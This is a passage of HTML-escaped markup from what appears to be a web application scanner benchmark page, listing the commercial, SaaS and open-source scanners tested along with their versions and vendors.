&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;builds 773/778&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;NT OBJECTives&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/68.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Netsparker&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v3.1.7.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Netsparker Ltd, &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;p.k.a
  Mavituna Security&lt;b&gt;)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/76.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;IBM AppScan&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v9.0.0.999 &amp;amp; v8.8.0.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;build 466 &lt;b&gt;(IBM)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/62.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebInspect&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v10.1.177.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;SecureBase 4.11.00&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(HP)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Syhunt Dynamic&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;v5.0.0.7 RC2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Syhunt)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/60.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Burp Suite&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.5.20&lt;b&gt; (Portswigger)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;N-Stalker Enterprise Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; X, build 10.13.11.31 (&lt;b&gt;N-Stalker&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/66.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebCruiser&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v2.7.0 EE &lt;b&gt;(Janus Security)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following &lt;b&gt;SAAS&lt;/b&gt; services were &lt;b&gt;assessed&lt;/b&gt; in
the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 213.05pt;&quot; valign=&quot;top&quot; width=&quot;284&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/scans/63.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Qualys&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  WAS &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;- during January 2014&lt;b&gt; (Qualys&lt;i&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 213.05pt;&quot; valign=&quot;top&quot; width=&quot;284&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;ScanToSecure&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;- during
  January 2014 &lt;b&gt;(Netsparker Ltd&lt;i&gt;)&lt;/i&gt;&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The &lt;b&gt;previous&lt;/b&gt; results of the following &lt;b&gt;commercial&lt;/b&gt;
scanners were &lt;b&gt;included&lt;/b&gt; in the benchmark, since they were not updated
since the previous benchmark (website):&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/64.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;ParosPro&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.9.12 &lt;b&gt;(Milescan&lt;i&gt;)&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/67.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;JSky&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v3.5.1-905 &lt;b&gt;(NoSec)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/79.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Ammonite&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.2 &lt;b&gt;(RyscCorp)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following &lt;b&gt;commercial&lt;/b&gt; scanners will be updated
soon:&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Nessus (Tenable Network Security)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; - Web Scanning Features&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The &lt;b&gt;latest versions&lt;/b&gt; of following &lt;b&gt;free/open source&lt;/b&gt;
scanners were &lt;b&gt;re-tested&lt;/b&gt;:&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Zed Attack Proxy (ZAP) &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;v&lt;/span&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;2.2.2&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt; &lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;IronWASP &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;v&lt;/span&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span dir=&quot;RTL&quot;&gt;&lt;/span&gt; 0.9.7.4&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span 